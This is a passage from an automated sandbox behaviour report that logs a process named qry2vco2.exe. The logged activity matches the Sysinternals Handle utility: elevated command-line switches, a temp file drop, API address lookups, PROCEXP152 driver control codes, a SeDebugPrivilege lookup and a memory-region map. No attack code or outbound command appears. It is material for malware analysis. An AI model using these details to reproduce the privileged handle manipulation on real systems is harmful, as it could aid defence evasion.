| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ffc57be38a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ffc57be4980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ffc57be47f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ffc57be46c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ffc57be3ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ffc57be3640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ffc57be3a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ffc57bb5d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ffc57b6f0d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ffc57b736a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ffc57b73dc0 |
|
1 |
Driver (242)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
157 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
6 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
69 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #239: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #239 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:53, Reason: Child Process |
| Unmonitor | End Time: 00:03:57, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x41c |
| Parent PID | 0x464 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F70
0x
95C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002f0000 | 0x00319fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00847fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x009d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x01ddffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
